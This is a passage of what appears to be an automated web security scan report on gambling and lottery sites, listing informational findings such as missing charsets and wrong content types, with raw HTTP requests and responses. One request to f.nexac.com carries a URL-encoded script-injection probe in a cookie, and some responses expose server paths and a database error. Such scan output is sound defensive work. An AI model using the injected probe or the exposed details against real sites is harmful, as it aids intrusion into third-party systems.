<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.38. https://www.interwetten.com/en/water-polo-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/water-polo-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:19 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:19 GMT
Connection: close
Content-Length: 221931
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.39. https://www.interwetten.com/en/winter-games-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/winter-games-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:30 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:29 GMT
Connection: close
Content-Length: 221922
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.40. https://www.norskelodd.com/no/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/

Request

Response

24.41. https://www.norskelodd.com/no/FAQ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/FAQ

Request

GET /no/FAQ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

24.42. https://www.norskelodd.com/no/aboutus/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/aboutus/

Request

GET /no/aboutus/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

24.43. https://www.norskelodd.com/no/charity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/charity/

Request

GET /no/charity/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

24.44. https://www.norskelodd.com/no/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/default.aspx

Request

GET /no/default.aspx HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

24.45. https://www.norskelodd.com/no/fair-play/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/fair-play/

Request

GET /no/fair-play/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

24.46. https://www.norskelodd.com/no/forgotten-password previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/forgotten-password

Request

GET /no/forgotten-password HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

24.47. https://www.norskelodd.com/no/play/3Wow previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/play/3Wow

Request

GET /no/play/3Wow HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

24.48. https://www.norskelodd.com/no/play/7thHeaven previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/play/7thHeaven

Request

GET /no/play/7thHeaven HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

24.49. https://www.norskelodd.com/no/play/GonzosQuest previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/play/GonzosQuest

Request

GET /no/play/GonzosQuest HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

24.50. https://www.norskelodd.com/no/promotions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/promotions/

Request

GET /no/promotions/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

24.51. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.postcodelottery.com
Path:	/PlayNOW/OrderYourTickets.htm

Request

Response

24.52. https://www.thawte.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.thawte.com
Path:	/

Request

GET / HTTP/1.1
Host: www.thawte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25. HTML does not specify charset previous next
There are 25 instances of this issue:

http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427
http://d.xp1.ru4.com/um
http://download.neogames-tech.com/
http://f.nexac.com/favicon.ico
http://in.getclicky.com/
https://in.getclicky.com/
http://members.bet365.com/site.asp
http://neogames-tech.com/outbound/article/www.lga.org.mt
http://pixel.invitemedia.com/data_sync
http://trk.primescratchcards.com/
http://www.gamblersanonymous.org/
http://www.maestrocard.com/
http://www.mastercard.com/uk/gateway.html
http://www.neogames.com/outbound/article/crazyscratch.com
http://www.neogames.com/outbound/article/karamba.com
http://www.neogames.com/outbound/article/mundirasca.com
http://www.neogames.com/outbound/article/norgesloddet.com
http://www.neogames.com/outbound/article/scratch.betsson.com
http://www.neogames.com/outbound/article/www.crazyscratch.com
http://www.neogames.com/outbound/article/www.interwetten.com
http://www.neogames.com/outbound/article/www.postcodelottery.co.uk
http://www.neogames.com/outbound/article/www.winnings.com
http://www.primescratchcards.com/track/
http://www.verisign.co.uk/
http://www.winnings.com/wp-admin/admin-ajax.php

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

25.1. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

Request

Response

25.2. http://d.xp1.ru4.com/um previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/um

Request

GET /um?_o=62795&_i=97956&_u=79bc469d-a782-45e9-dad7-b6bd4bc5df2d HTTP/1.1
Host: d.xp1.ru4.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: X1ID=AA-00000001931708427; M62795-52786=1; 17210403-B17210472=6|17210476|0|0|0|17210467|17226289|-1; O1807966=256; P1807966=c3N2X2MzfFl8MTMwNTU1MDMzMXxzc3ZfYnxjM3wxMzA1NTUwMzMxfHNzdl8xfDI4NTk1MjcyMXwxMzA1NTUwMzMxfA==

Response

HTTP/1.1 400 Bad request
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 12:52:13 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Content-length: 147
Content-type: text/html
Connection: close

<HTML><HEAD><TITLE>Bad request</TITLE></HEAD>
<BODY><H1>Bad request</H1>
Your browser sent a query this server could not understand.
</BODY></HTML>

25.3. http://download.neogames-tech.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.neogames-tech.com
Path:	/

Request

GET / HTTP/1.1
Host: download.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.4.10.1305545979;

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:58:38 GMT
Connection: close

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...

25.4. http://f.nexac.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://f.nexac.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: f.nexac.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: na_tc=Y; na_id=326a9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efa144a76584; na_lr=20110515; na_ps=3

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Mon, 16 May 2011 11:39:06 GMT
Server: lighttpd/1.4.19

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

25.5. http://in.getclicky.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://in.getclicky.com
Path:	/

Request

GET / HTTP/1.1
Host: in.getclicky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cluid=6787569821139589215;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:39:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 4
Connection: close
Content-Type: text/html

Hmm.

25.6. https://in.getclicky.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://in.getclicky.com
Path:	/

Request

GET / HTTP/1.1
Host: in.getclicky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cluid=6787569821139589215;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 4
Connection: close
Content-Type: text/html

Hmm.

25.7. http://members.bet365.com/site.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://members.bet365.com
Path:	/site.asp

Request

GET /site.asp HTTP/1.1
Host: members.bet365.com
Proxy-Connection: keep-alive
Referer: http://www.bet365.com/en/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:40:52 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Cteonnt-Length: 1230
Content-Type: text/html
Cache-control: private
Content-Length: 1230

<html>
<head>
<script language="JavaScript" src="./home/js/swfobject_vB006cr.js"></script>
<script language="JavaScript" src="./home/js/cookies_vA002cr.js"></script>
</he
...[SNIP]...

25.8. http://neogames-tech.com/outbound/article/www.lga.org.mt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://neogames-tech.com
Path:	/outbound/article/www.lga.org.mt

Request

GET /outbound/article/www.lga.org.mt HTTP/1.1
Host: neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.3.10.1305545979;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:27:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.9. http://pixel.invitemedia.com/data_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/data_sync

Request

Response

25.10. http://trk.primescratchcards.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trk.primescratchcards.com
Path:	/

Request

Response

25.11. http://www.gamblersanonymous.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamblersanonymous.org
Path:	/

Request

Response

25.12. http://www.maestrocard.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maestrocard.com
Path:	/

Request

GET / HTTP/1.1
Host: www.maestrocard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:50:21 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 312
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Priceless.com<
...[SNIP]...

25.13. http://www.mastercard.com/uk/gateway.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mastercard.com
Path:	/uk/gateway.html

Request

GET /uk/gateway.html HTTP/1.1
Host: www.mastercard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Pragma: no-cache
cache-control: no-cache
Content-Type: text/html
Content-Length: 65

<html><head><meta http-equiv="refresh" content="0"></head></html>

25.14. http://www.neogames.com/outbound/article/crazyscratch.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neogames.com
Path:	/outbound/article/crazyscratch.com

Request

GET /outbound/article/crazyscratch.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.15. http://www.neogames.com/outbound/article/karamba.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neogames.com
Path:	/outbound/article/karamba.com

Request

GET /outbound/article/karamba.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.16. http://www.neogames.com/outbound/article/mundirasca.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neogames.com
Path:	/outbound/article/mundirasca.com

Request

GET /outbound/article/mundirasca.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.17. http://www.neogames.com/outbound/article/norgesloddet.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neogames.com
Path:	/outbound/article/norgesloddet.com

Request

GET /outbound/article/norgesloddet.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.18. http://www.neogames.com/outbound/article/scratch.betsson.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neogames.com
Path:	/outbound/article/scratch.betsson.com

Request

GET /outbound/article/scratch.betsson.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.19. http://www.neogames.com/outbound/article/www.crazyscratch.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neogames.com
Path:	/outbound/article/www.crazyscratch.com

Request

GET /outbound/article/www.crazyscratch.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.20. http://www.neogames.com/outbound/article/www.interwetten.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neogames.com
Path:	/outbound/article/www.interwetten.com

Request

GET /outbound/article/www.interwetten.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.21. http://www.neogames.com/outbound/article/www.postcodelottery.co.uk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neogames.com
Path:	/outbound/article/www.postcodelottery.co.uk

Request

GET /outbound/article/www.postcodelottery.co.uk HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.22. http://www.neogames.com/outbound/article/www.winnings.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neogames.com
Path:	/outbound/article/www.winnings.com

Request

GET /outbound/article/www.winnings.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

25.23. http://www.primescratchcards.com/track/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/track/

Request

GET /track/ HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 12:34:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
p3p: policyref="/w3c/p3p.xml"
Content-Length: 418
Content-Type: text/html
Cache-control: private

<html>
<head>
<link rel="p3pv1" href="/w3c/p3p.xml"></link>
</head>
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e14'</fon
...[SNIP]...

25.24. http://www.verisign.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.co.uk
Path:	/

Request

GET / HTTP/1.1
Host: www.verisign.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.25. http://www.winnings.com/wp-admin/admin-ajax.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/wp-admin/admin-ajax.php

Request

Response

26. Content type incorrectly stated previous next
There are 18 instances of this issue:

http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json
http://in.getclicky.com/
https://in.getclicky.com/
http://neogames-tech.com/outbound/article/www.lga.org.mt
http://rtb50.doubleverify.com/rtb.ashx/verifyc
https://secure.neogames-tech.com/ScratchCards/images/seal_background.png
http://server.iad.liveperson.net/hcp/html/mTag.js
http://trk.primescratchcards.com/w3c/p3p.xml
http://www.neogames.com/outbound/article/crazyscratch.com
http://www.neogames.com/outbound/article/karamba.com
http://www.neogames.com/outbound/article/mundirasca.com
http://www.neogames.com/outbound/article/norgesloddet.com
http://www.neogames.com/outbound/article/scratch.betsson.com
http://www.neogames.com/outbound/article/www.crazyscratch.com
http://www.neogames.com/outbound/article/www.interwetten.com
http://www.neogames.com/outbound/article/www.postcodelottery.co.uk
http://www.neogames.com/outbound/article/www.winnings.com
http://www.winnings.com/wp-admin/admin-ajax.php

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

